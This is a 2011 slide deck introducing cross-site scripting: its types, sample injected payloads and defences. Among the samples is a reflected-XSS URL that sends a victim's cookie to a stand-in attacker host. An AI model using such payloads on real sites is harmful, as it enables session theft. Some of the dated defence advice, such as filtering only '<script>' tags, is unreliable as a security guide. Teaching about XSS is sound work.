180 likes | 464 Views
Cross Site Scripting (XSS). Ashish Dhital 21 st April 2011. XSS: Background. Web sites are ubiquitous today Immense popularity brings variety of attacks Mostly SQL Injection, DoS , XSS XSS introduction, types, defense and conclusion. XSS: Introduction.
E N D
Cross Site Scripting (XSS) AshishDhital 21st April 2011
XSS: Background • Web sites are ubiquitous today • Immense popularity brings variety of attacks • Mostly SQL Injection, DoS, XSS • XSS introduction, types, defense and conclusion
XSS: Introduction • XSS exploits websites by inserting malicious client side scripts in dynamic websites • Making use of browser’s vulnerabilities Bypassing same origin policy enforced by browser • Exploitation of HTML, JS, VBScript, ActiveX • Objective – session hijacking, redirection, stealing information • 80% of Attacks against Websites today • In 2010, various XSS vulnerabilities were found in Amazon, eBay, PayPal, American Express • McAfee’s site has been shown to have XSS vulnerabilities (as of March 2011)
XSS: Script Insertion • Examples of Insertion of Scripts in HTML tags <BODY ONLOAD =alert (“evilmessage”) /> <IMG SR =”Javascript: alert (“evilmessage”) /> <LINK REL=”STYLESHEET” HREF=”Javscript.alert (“evilmessage”) /> • Flash Exploitation <EMBED SRC= http://dangeroussite.com/evilflash.swf “ AllowScriptAccess=”always” />
XSS: Types • DOM Based Attack • Reflected / Non- persistent Attack • Stored/ Persistent Attack
XSS: DOM Based Attack • Exploitation of DOM Entities document. Location, document.URL, and document.referer properties • Payload in the URL sent to unsuspecting users http://www.genuinewebsite.com/getAC.php?username=<script>alert (“harmful script”) </script> • Unexpected/Undesired execution of client-side script
XSS: Reflected/ Non-Persistent • Most common form of XSS attack • Data provided by web-client is immediately used by web-server to relay back a resulting page • Confirmation, Error , Search queries • Usually a malicious link provided by social engineering techniques Ex. http://www.genuinesite.com/getAc.php?username=<script>document.location='http://attackersite.ample/cgibin/stolencookie.cgi?'+document.cookie)</script>
XSS: Stored/ Persistent • Most powerful one in terms of the possible damage • Inserting a malicious code into a form or input field which is stored in the server • Could infect other users, web-server, propagate rapidly • Example: The attacker inserts a script as a blog post (Of course the input text is not filtered or sanitized). A user who visits the site later clicks on the blog post. And, the script executes! Possible worm?
XSS: Defense and Prevention • User Input Validation / Sanitization, Parameter Verification • Careful Checking HTTP Request to HTML Output • Filtering out unnecessary characters using regular expression Example: Filtering out anything that starts with <script>
XSS: Defense and Prevention • Data verification for various properties of HTML tags like attribute, style, width • Cookies Protection Cookie – holds information about the surfer IP Address Verification ( Effective for Proxy Server ? ) HTTPOnly Flag Possible Solution – Triple DES Encryption
XSS: Defense and Prevention • Available Tools to Minimize XSS attack Noxes : Windows based firewall Configuration for browser based connections Samurai XJs
XSS: Defense and Prevention • How can a user defend oneself from XSS attacks? Disabling script when not required. Avoid clicking on unknown sites, URLs, or message boards. Accessing a site through its own address and not through third-party sites. Keeping oneself updated about sites and message boards that have been blacklisted as malicious sites.
XSS: Conclusion • Preventive Steps May work for vulnerabilities known today • Hackers are always at work to discover zero day vulnerabilities • Web Development team should constantly update themselves • Security is an ongoing process!
XSS: References • Bodmer, Fabrice. Cross-Site Scripting (XSS). Tech. Computer and Network Security Seminar. Web. 12 Apr. 2011. <http://diuf.unifr.ch/drupal/tns/sites/diuf.unifr.ch.drupal.tns/files/Teaching/2006_2007/Computer_Security_Threats_and_Counter_Measures/Bodmer_CrossSiteScripting.pdf>. • Kirda, Engin, Christopher Kruegel, Giovanni Vigna, and NenadJovanovic. Noxes: A Client-Side Solution for Mitigating Cross-Site Scripting Attacks. Noxes: A Client-Side Solution for Mitigating Cross-Site Scripting Attacks. Web. 12 Apr. 2011. <http://www.cs.ucsb.edu/~vigna/publications/2006_kirda_kruegel_vigna_jovanovic_SAC.pdf>. • Mohammadi, S., and FarhadKoohbor. Protecting Cookies against Cross-site Scripting Attacks Using Cryptography. Http://www.wseas.us. Web. 12 Apr. 2011. <http://www.wseas.us/e-library/conferences/2010/Merida/ISPACT/ISPACT-02.pdf>. • Sharma, Anand. "Prevent a Cross-Site Scripting Attack." IBM - United States. IBM, 03 Feb. 2004. Web. 12 Apr. 2011. <http://www.ibm.com/developerworks/web/library/wa-secxss/>. • Cross-site Scripting (XSS) - OWASP." OWASP (Open Web Application Security Project). Fortify Software, 10 Oct. 2010. Web. 16 Apr. 2011. <https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)>. • "Cross-site Scripting." Wikipedia, the Free Encyclopedia. Web. 17 Apr. 2011. <http://en.wikipedia.org/wiki/Cross-site_scripting>. • XSSed | Cross Site Scripting (XSS) Attacks Information and Archive. Web. 17 Apr. 2011. <http://www.xssed.com/>.